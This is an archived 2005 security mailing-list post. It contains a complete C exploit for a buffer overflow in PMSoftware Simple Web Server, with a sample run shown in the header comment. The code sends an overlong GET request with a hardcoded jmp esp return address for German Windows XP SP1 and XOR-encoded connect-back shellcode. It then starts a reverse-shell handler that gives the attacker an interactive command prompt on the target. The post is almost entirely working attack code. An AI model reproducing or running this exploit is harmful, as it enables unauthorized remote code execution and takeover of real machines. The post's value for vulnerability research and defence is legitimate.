OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
RE: ERNW Security Advisory 01/2005 [ EXPLOIT ]

cybertronicgmx.net
Date: Tue Apr 19 2005 - 08:29:42 CDT


/*
 *
 * PMSoftware Simple Web Server Buffer Overflow
Exploit
 *
 * cybertronic[at]gmx[dot]net
 * 04/19/2005
 * __ __
_
 * _______ __/ /_ ___ _____/ /__________ ____
(_)____
 * / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __
\/ / ___/
 * / /__/ /_/ / /_/ / __/ / / /_/ / / /
_/ / / / / / /__
 * \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/
\___/
 * /____/
 *
 * --[ exploit by : cybertronic -
cybertronic[at]gmx[dot]net
 * --[ connecting to 192.168.2.101:80...done!
 * --[ exploiting WinXP Pro SP1 GER
 * --[ ret: 0x71a17bfb [ jmp esp in ws2_32.dll ]
 * --[ sending GET request [ 543 bytes ]...done!
 * --[ starting reverse handler [port: 31337]...done!
 * --[ incomming connection from: 192.168.2.101
 * --[ b0x pwned - h4ve phun
 * Microsoft Windows XP [Version 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * C:\PMSoftware>
 *
 */
 
 
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
 
#define PORT 80
 
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
 
/*
 *
 * prototypes
 *
 */
 
int exploit ( int s, unsigned long xoredip, unsigned
short xoredcbport );
int shell ( int s, char* tip, unsigned short
cbport );
 
void header ();
void start_reverse_handler ( char* argv3 );
 
/*********************
* Windows Shellcode *
*********************/
 
/*
 * Type : connect back shellcode
 * Length: 316 bytes
 * CBIP : reverseshell[111] ( ^ 0x99999999 )
 * CBPort: reverseshell[118] ( ^ 0x9999 )
 *
 */
 
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B
\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6
\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91
\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99
\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B
\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99
\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12
\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8
\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9
\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89
\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD
\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF
\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66
\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C
\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96
\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86
\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A
\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17
\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52
\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
 
/*
 *
 * functions
 *
 */
 
int
exploit ( int s, unsigned long xoredip, unsigned
short xoredcbport )
{
        char in[2048], request[1024];
        unsigned long jmpesp = 0x71a17bfb; //
ws2_32.dll WinXP Pro SP1 GER
         
        printf ( "--[ exploiting WinXP Pro SP1 GER
\n" );
        printf ( "--[ ret: 0x%08x [ jmp esp in
ws2_32.dll ]\n", jmpesp );
         
        memcpy ( &reverseshell[111], &xoredip, 4);
        memcpy ( &reverseshell[118], &xoredcbport,
2);
         
        bzero ( &request, sizeof ( request ) );
        request[0] = 0x47;
        request[1] = 0x45;
        request[2] = 0x54;
        request[3] = 0x20;
        request[4] = 0x2f;
        memset ( request + 5, 0x41, 216 );
        strncat ( request, ( unsigned char* )
&jmpesp, 4 );
        memcpy ( request + 225, reverseshell, sizeof
( reverseshell ) - 1 );
        strcat ( request, "\r\n" );
 
        printf ( "--[ sending GET request [ %d
bytes ]...", strlen ( request ) );
        if ( write ( s, request, strlen ( request ) )
<= 0 )
        {
                printf ( "failed!\n" );
                return ( 1 );
        }
        printf ( "done!\n" );
        return ( 0 );
}
 
int
shell ( int s, char* tip, unsigned short cbport )
{
        int n;
        char buffer[2048];
        fd_set fd_read;
 
        printf ( "--[" YELLOW " b" NORMAL "0" YELLOW
"x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e"
NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL
"v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u"
YELLOW "n" NORMAL "\n" );
 
        FD_ZERO ( &fd_read );
        FD_SET ( s, &fd_read );
        FD_SET ( 0, &fd_read );
 
        while ( 1 )
        {
                FD_SET ( s, &fd_read );
                FD_SET ( 0, &fd_read );
 
                if ( select ( s + 1, &fd_read, NULL,
NULL, NULL ) < 0 )
                        break;
                if ( FD_ISSET ( s, &fd_read ) )
                {
                        if ( ( n = recv ( s, buffer,
sizeof ( buffer ), 0 ) ) < 0 )
                        {
                                printf ( "bye bye...
\n" );
                                return;
                        }
                        if ( write ( 1, buffer, n ) <
0 )
                        {
                                printf ( "bye bye...
\n" );
                                return;
                        }
                }
                if ( FD_ISSET ( 0, &fd_read ) )
                {
                        if ( ( n = read ( 0, buffer,
sizeof ( buffer ) ) ) < 0 )
                        {
                                printf ( "bye bye...
\n" );
                                return;
                        }
                        if ( send ( s, buffer, n, 0 )
< 0 )
                        {
                                printf ( "bye bye...
\n" );
                                return;
                        }
                }
                usleep(10);
        }
}
 
void
header ()
{
        printf ( " __ __
_ \n" );
        printf ( " _______ __/ /_ ___ _____/ /
__________ ____ (_)____ \n" );
        printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/
___/ __ \\/ __ \\/ / ___/ \n" );
        printf ( "/ /__/ /_/ / /_/ / __/ / / /
_/ / / /_/ / / / / / /__ \n" );
        printf ( "\\___/\\__, /_.___/\\___/_/ \\__/
_/ \\____/_/ /_/_/\\___/ \n" );
        printf ( " /____/
\n\n" );
        printf ( "--[ exploit by : cybertronic -
cybertronic[at]gmx[dot]net\n" );
}
 
void
start_reverse_handler ( char* argv3 )
{
        int s1, s2;
        unsigned short cbport;
        struct sockaddr_in cliaddr, servaddr;
        socklen_t clilen = sizeof ( cliaddr );
 
        sscanf ( argv3, "%u", &cbport );
         
        bzero ( &servaddr, sizeof ( servaddr ) );
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr = htonl
( INADDR_ANY );
        servaddr.sin_port = htons ( cbport );
 
        printf ( "--[ starting reverse handler [port:
%u]...", cbport );
        if ( ( s1 = socket ( AF_INET, SOCK_STREAM,
0 ) ) == -1 )
        {
                printf ( "socket failed!\n" );
                exit ( 1 );
        }
        bind ( s1, ( struct sockaddr * ) &servaddr,
sizeof ( servaddr ) );
        if ( listen ( s1, 1 ) == -1 )
        {
                printf ( "listen failed!\n" );
                exit ( 1 );
        }
        printf ( "done!\n" );
        if ( ( s2 = accept ( s1, ( struct sockaddr
* ) &cliaddr, &clilen ) ) < 0 )
        {
                printf ( "accept failed!\n" );
                exit ( 1 );
        }
        close ( s1 );
        printf ( "--[ incomming connection from:\t%s
\n", inet_ntoa ( cliaddr.sin_addr ) );
        shell ( s2, ( char* ) inet_ntoa
( cliaddr.sin_addr ), cbport );
        close ( s2 );
}
 
int
main ( int argc, char* argv[] )
{
        int s;
        unsigned long xoredip;
        unsigned short cbport, xoredcbport;
        struct sockaddr_in remote_addr;
        struct hostent *host_addr;
 
        if ( argc != 4 )
        {
                printf ( "Usage: %s <ip> <cbip>
<cbport>\n", argv[0] );
                exit ( 1 );
        }
        system ( "clear" );
        header ();
        if ( ( host_addr = gethostbyname
( argv[1] ) ) == NULL )
        {
                fprintf ( stderr, "cannot resolve \"%
s\"\n", argv[1] );
                exit ( 1 );
        }
        remote_addr.sin_family = AF_INET;
        remote_addr.sin_addr = * ( ( struct in_addr
* ) host_addr->h_addr );
        remote_addr.sin_port = htons ( PORT );
        if ( ( s = socket ( AF_INET, SOCK_STREAM,
0 ) ) < 0 )
    {
                printf ( "socket failed!\n" );
                exit ( 1 );
        }
        printf ( "--[ connecting to %s:%u...",
argv[1], PORT );
        if ( connect ( s, ( struct sockaddr * )
&remote_addr, sizeof ( struct sockaddr ) ) == -1 )
        {
                printf ( "failed!\n" );
                exit ( 1 );
        }
        printf ( "done!\n" );
         
        xoredip = inet_addr ( argv[2] ) ^ ( unsigned
long ) 0x99999999;
        xoredcbport = htons ( atoi ( argv[3] ) ) ^
( unsigned short ) 0x9999;
 
        if ( exploit ( s, xoredip, xoredcbport ) ==
1 )
        {
                printf ( "exploitation FAILED!\n" );
                exit ( 1 );
        }
        start_reverse_handler ( argv[3] );
}